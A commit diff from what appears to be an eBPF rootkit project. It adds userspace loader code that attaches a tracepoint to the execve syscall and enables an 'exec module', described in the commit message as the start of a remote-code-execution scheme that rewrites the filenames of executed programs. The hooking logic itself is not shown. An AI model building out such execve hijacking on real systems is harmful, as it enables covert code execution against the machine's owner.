Initial version of the RCE scheme- Added complete execve hook, helper and modifying capabilities for the filename called. Works still needs to be done

src/user/include/modules/exec.h

@@ -0,0 +1,34 @@
+#ifndef __MOD_EXEC_H
+#define __MOD_EXEC_H
+
+#include <linux/bpf.h>
+#include <bpf/bpf.h>
+#include <bpf/libbpf.h>
+#include "common.h"
+#include "kit.skel.h"
+
+//Connections
+int attach_tp_sys_enter_execve(struct kit_bpf *skel){
+    skel->links.tp_sys_enter_execve = bpf_program__attach(skel->progs.tp_sys_enter_execve);
+	return libbpf_get_error(skel->links.tp_sys_enter_execve);
+}
+
+int attach_exec_all(struct kit_bpf *skel){
+    return attach_tp_sys_enter_execve(skel);
+}
+
+
+int detach_tp_sys_enter_execve(struct kit_bpf *skel){
+    int err = detach_link_generic(skel->links.tp_sys_enter_execve);
+    if(err<0){
+        fprintf(stderr, "Failed to detach fs link\n");
+        return -1;
+    }
+    return 0;
+}
+
+int detach_exec_all(struct kit_bpf *skel){
+    return detach_tp_sys_enter_execve(skel);
+}
+
+#endif

src/user/include/modules/module_manager.c

@@ -2,6 +2,7 @@
 #include "xdp.h"
 #include "sched.h"
 #include "fs.h"
+#include "exec.h"
 
 module_config_t module_config = {
     .xdp_module = {
@@ -17,6 +18,10 @@ module_config_t module_config = {
         .tp_sys_enter_read = OFF,
         .tp_sys_exit_read = OFF,
         .tp_sys_enter_openat = OFF
+    },
+    .exec_module = {
+        .all = ON,
+        .tp_sys_enter_execve = OFF
     }
 
 };
@@ -28,7 +33,8 @@ module_config_attr_t module_config_attr = {
         .flags = -1
     },
     .sched_module = {},
-    .fs_module = {}
+    .fs_module = {},
+    .exec_module = {}
 };
 
 
@@ -64,6 +70,14 @@ int setup_all_modules(){
     }
     if(ret!=0) return -1;
 
+    //EXEC
+    if(config.exec_module.all == ON){
+        ret = attach_exec_all(attr.skel);
+    }else{
+        if(config.exec_module.tp_sys_enter_execve == ON) ret = attach_tp_sys_enter_execve(attr.skel);
+    }
+    if(ret!=0) return -1;
+
 
     return 0;
 }

src/user/include/modules/module_manager.h

@@ -30,6 +30,11 @@ typedef struct module_config_t{
         char tp_sys_enter_openat;
     }fs_module;
 
+    struct exec_module {
+        char all;
+        char tp_sys_enter_execve;
+    }exec_module;
+
 } module_config_t;
 
 //Configuration struct. Used by the module manager to
@@ -49,6 +54,10 @@ typedef struct module_config_attr_t{
         void* __empty;
     }fs_module;
 
+    struct exec_module_attr {
+        void* __empty;
+    }exec_module;
+
 } module_config_attr_t;
 
 //An unique module configutation struct and attr